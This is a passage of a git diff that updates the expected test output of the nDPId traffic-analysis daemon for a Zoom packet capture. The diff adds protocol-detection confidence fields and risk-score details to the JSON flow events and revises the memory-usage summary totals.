 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1642965460395,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1642965460395,"pkt":"KDc3AG3IEBMx8Tl2CABFAABIvbFAADER7zuQw0mawKgBsiJh4wUANKrxAgADlUCX4nL8uBw5x1bMJMqfpQBPg3kAb2OvAAAAAAAAAAAAQABAAAPgAwA="}
 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1642965460461,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"ts_msec":1642965460461,"pkt":"EBMx8Tl2KDc3AG3ICABFAACZ6kAAAEAR81vAqAGykMNJmuJhImEAhaEiAQADwkJYttycXaTnsMPEsai0ugAAAAAAAAACAG9koQBvZKEAAABA6DEQatkP0ZiaMugg0SFSq6JqmaXOleBRM3eRUGv0uLvPr6CL4g3oVryKRdoOzve7SJqEd+2jwB1vjsn7k5LMNv\/\/\/\/8AQABAAAB1MAABAAMAAiAACgA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1642965460546,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1642965460546,"pkt":"KDc3AG3IEBMx8Tl2CABFAABIvg1AAC8R8N+Qw0mawKgBsiJh4mEANErbAgADwkJYttycXaTnsMPEsai0ugBPg3oAb2Q7AAAAAAAAAAAAQABAAAPgAwA="}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":497,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965460219,"flow_last_seen":1642965460887,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":3224,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1642965460887,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","ndpi": {"proto":"Zoom","breed":"Acceptable","category":"Video"}}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965460219,"flow_last_seen":1642965460887,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":3224,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1642965460887,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated","category":"Video"}}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":575,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965460359,"flow_last_seen":1642965461085,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":2012,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1642965461085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","ndpi": {"proto":"Zoom","breed":"Acceptable","category":"Video"}}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965460359,"flow_last_seen":1642965461085,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":2012,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1642965461085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated","category":"Video"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":497,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965460219,"flow_last_seen":1642965460887,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":3224,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1642965460887,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965460219,"flow_last_seen":1642965460887,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":3224,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1642965460887,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":575,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965460359,"flow_last_seen":1642965461085,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":2012,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1642965461085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1642965460359,"flow_last_seen":1642965461085,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":2012,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1642965461085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
 00544{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965500049,"flow_last_seen":1642965500049,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1642965500049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1642965500049,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1642965500049,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4064AAEABCl\/AqAGykMNJmgMD9zUAAAAARQAAdCt\/QAAxEYFCkMNJmsCoAbIiYeMFAGAAAA=="}
-00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965500049,"flow_last_seen":1642965500049,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1642965500049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.253434}
+00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11804,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642965500049,"flow_last_seen":1642965500049,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1642965500049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.253434}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11812,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1642965500053,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1642965500053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA48ZAAAEAB7HzAqAGykMNJmgMD6XYAAAAARQAESyuFQAAxEX1lkMNJmsCoAbIiYeztBDcAAA=="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11815,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1642965500054,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1642965500054,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4fvIAAEABXxvAqAGykMNJmgMD6XYAAAAARQAESyuHQAAxEX1jkMNJmsCoAbIiYeztBDcAAA=="}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":87,"flow_first_seen":1642965460359,"flow_last_seen":1642965500043,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated","category":"Video"}}
-00713{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":902,"flow_first_seen":1642965458402,"flow_last_seen":1642965502810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":107730,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2230,"flow_first_seen":1642965460219,"flow_last_seen":1642965500203,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":368542,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated","category":"Video"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8731,"flow_first_seen":1642965459595,"flow_last_seen":1642965500185,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1297,"flow_tot_l4_payload_len":7999131,"flow_avg_l4_payload_len":916,"midstream":0,"ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated","category":"Video"}}
-00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1642965500049,"flow_last_seen":1642965500203,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":972,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":87,"flow_first_seen":1642965460359,"flow_last_seen":1642965500043,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":57953,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":902,"flow_first_seen":1642965458402,"flow_last_seen":1642965502810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":107730,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":50076,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2230,"flow_first_seen":1642965460219,"flow_last_seen":1642965500203,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":368542,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":58117,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8731,"flow_first_seen":1642965459595,"flow_last_seen":1642965500185,"flow_idle_time":180000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1297,"flow_tot_l4_payload_len":7999131,"flow_avg_l4_payload_len":916,"midstream":0,"ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","src_port":60653,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1642965500049,"flow_last_seen":1642965500203,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":972,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1642965502810,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"144.195.73.154","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11977,"source":"zoom2.pcap","alias":"nDPId-test","total-events-serialized":37}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 11977/11977
@@ -43,10 +43,10 @@
 ~~ total active/idle flows...: 5/5
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4960147 bytes
-~~ total memory freed........: 4960147 bytes
-~~ total allocations/frees...: 111551/111551
+~~ total memory allocated....: 5043788 bytes
+~~ total memory freed........: 5043788 bytes
+~~ total allocations/frees...: 113141/113141
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 1254 chars
-~~ json string avg len.......: 777 chars
+~~ json string max len.......: 1360 chars
+~~ json string avg len.......: 830 chars
-- 
cgit v1.2.3